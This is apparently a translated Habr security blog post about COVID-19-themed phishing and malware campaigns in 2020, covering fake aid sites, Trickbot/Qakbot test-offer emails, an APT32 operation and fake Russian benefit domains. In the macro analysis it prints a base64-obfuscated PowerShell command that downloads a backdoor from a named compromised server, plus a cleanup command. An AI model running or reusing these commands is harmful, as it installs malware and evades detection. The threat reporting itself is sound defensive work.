Hücumçular COVID-19 mövzusundan istifadə etməyə davam edərək epidemiya ilə bağlı hər şeylə maraqlanan istifadəçilər üçün getdikcə daha çox təhlükə yaradırlar. IN Koronavirusdan sonra hansı növ zərərli proqramların ortaya çıxmasından artıq danışdıq və bu gün müxtəlif ölkələrdə, o cümlədən Rusiyada istifadəçilərin artıq qarşılaşdıqları sosial mühəndislik texnikalarından danışacağıq. Ümumi tendensiyalar və nümunələr kəsim altındadır.
Yadda saxla İnsanların təkcə koronavirus və epidemiyanın gedişatı haqqında deyil, həm də maliyyə dəstəyi tədbirləri haqqında oxumağa hazır olmasından danışdıq? Budur yaxşı bir nümunə. Almaniyanın Şimali Reyn-Vestfaliya və ya NRW əyalətində maraqlı fişinq hücumu aşkarlanıb. Hücum edənlər İqtisadiyyat Nazirliyinin saytının surətlərini yaradıblar (), hər kəsin maliyyə yardımı üçün müraciət edə biləcəyi yer. Belə bir proqram həqiqətən mövcuddur və fırıldaqçılar üçün faydalı olduğu ortaya çıxdı. Onlar qurbanlarının şəxsi məlumatlarını aldıqdan sonra nazirliyin rəsmi saytına müraciət ediblər, lakin digər bank rekvizitlərini göstəriblər. Rəsmi məlumatlara görə, sxem aşkarlanana qədər 4 min belə saxta müraciət edilib. Nəticədə zərər çəkmiş vətəndaşlar üçün nəzərdə tutulan 109 milyon dollar fırıldaqçıların əlinə keçib.
COVID-19 üçün ödənişsiz sınaqdan keçmək istərdinizmi?
Koronavirus temalı fişinqin başqa bir əhəmiyyətli nümunəsi idi e-poçtlarda. Mesajlar koronavirus infeksiyası üçün pulsuz testdən keçmək təklifi ilə istifadəçilərin diqqətini çəkib. Bunlara əlavədə Trickbot/Qakbot/Qbot nümunələri var idi. Sağlamlığını yoxlamaq istəyənlər "əlavə edilmiş formanı doldurmağa" başlayanda kompüterə zərərli skript yükləndi. Sandboxing testindən qaçmaq üçün skript əsas virusu yalnız bir müddət sonra, müdafiə sistemləri heç bir zərərli fəaliyyətin baş verməyəcəyinə əmin olduqdan sonra yükləməyə başladı.
Əksər istifadəçiləri makroları aktivləşdirməyə inandırmaq da asan idi. Bunun üçün standart bir hiylə istifadə edildi: anketi doldurmaq üçün əvvəlcə makroları aktivləşdirməlisiniz, yəni VBA skriptini işə salmalısınız.
Gördüyünüz kimi, VBA skripti antiviruslardan xüsusi olaraq maskalanıb.
Windows-un defolt “Bəli” cavabını qəbul etməzdən əvvəl proqramın /T <saniyə> gözlədiyi bir gözləmə funksiyası var. Bizim vəziyyətimizdə skript müvəqqəti faylları silməzdən əvvəl 65 saniyə gözlədi:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Və gözləyərkən zərərli proqram yükləndi. Bunun üçün xüsusi PowerShell skripti işə salındı:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Base64 dəyərinin şifrəsini açdıqdan sonra PowerShell skripti Almaniyadan əvvəllər sındırılmış veb serverdə yerləşən arxa qapını yükləyir:
http://automatischer-staubsauger.com/feature/777777.pngvə adı altında saxlayır:
C:UsersPublictmpdirfile1.exe
Qovluq ‘C:UsersPublictmpdir’ əmrini ehtiva edən 'tmps1.bat' faylı işlədərkən silinir cmd /c mkdir ""C:UsersPublictmpdir"".
Dövlət orqanlarına məqsədyönlü hücum
Bundan əlavə, FireEye analitikləri bu yaxınlarda Vuhandakı hökumət strukturlarına, eləcə də Çin Fövqəladə İdarəetmə Nazirliyinə yönəlmiş APT32 hücumu barədə məlumat verdilər. Yayılan RTF-lərdən birində New York Times məqaləsinə keçid var idi . Bununla belə, onu oxuduqdan sonra zərərli proqram yükləndi (FireEye analitikləri nümunəni METALJACK olaraq təyin etdilər).
Maraqlıdır ki, aşkarlanma zamanı antivirusların heç biri bu nümunəni aşkar etməyib, Virustotal-a görə.
Rəsmi saytlar işləmədikdə
Fişinq hücumunun ən parlaq nümunəsi ötən gün Rusiyada baş verib. Buna səbəb 3 yaşdan 16 yaşa qədər uşaqlar üçün çoxdan gözlənilən müavinətin təyin edilməsi olub. 12 may 2020-ci il tarixində müraciətlərin qəbuluna başlanıldığı elan edildikdə, milyonlarla insan çoxdan gözlənilən yardım üçün Dövlət Xidmətlərinin saytına axışdı və portalı peşəkar DDoS hücumundan daha pis bir şəkildə sıradan çıxardı. Prezident “Dövlət xidmətləri müraciət axınının öhdəsindən gələ bilmir” deyəndə insanlar onlayn müraciətlərin qəbulu üçün alternativ saytın işə salınmasından danışmağa başladılar.
Problem ondadır ki, bir neçə sayt eyni anda işləməyə başladı və biri, posobie16.gosuslugi.ru saytındakı real, ərizələri həqiqətən qəbul edir, daha çox .
SearchInform-dan olan həmkarlar .ru zonasında 30-a yaxın yeni saxta domen aşkar ediblər. “Infosecurity” və “Softline” şirkəti aprelin əvvəlindən bəri 70-dən çox analoji saxta dövlət xidmətinin internet saytlarını izləyib. Onların yaradıcıları tanış simvollarla manipulyasiya edir, həmçinin gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie və s. söz birləşmələrindən istifadə edirlər.
Hype və sosial mühəndislik
Bütün bu nümunələr yalnız təcavüzkarların koronavirus mövzusundan uğurla pul qazandığını təsdiqləyir. Sosial gərginlik və aydın olmayan məsələlər nə qədər yüksək olarsa, fırıldaqçıların mühüm məlumatları oğurlamaq, insanları öz pullarından imtina etməyə məcbur etmək və ya sadəcə olaraq daha çox kompüteri sındırmaq şansları bir o qədər çox olur.
Pandemiyanın potensial olaraq hazırlıqsız insanları kütləvi şəkildə evdən işləməyə məcbur etdiyini nəzərə alsaq, təkcə şəxsi deyil, həm də korporativ məlumatlar risk altındadır. Məsələn, bu yaxınlarda Microsoft 365 (əvvəllər Office 365) istifadəçiləri də fişinq hücumuna məruz qalıblar. İnsanlar məktublara əlavə olaraq kütləvi “buraxılmış” səsli mesajlar alırdılar. Bununla belə, fayllar əslində hücum qurbanlarını göndərən bir HTML səhifəsi idi . Nəticədə, girişin itirilməsi və hesabdan bütün məlumatların kompromisi.
Mənbə: www.habr.com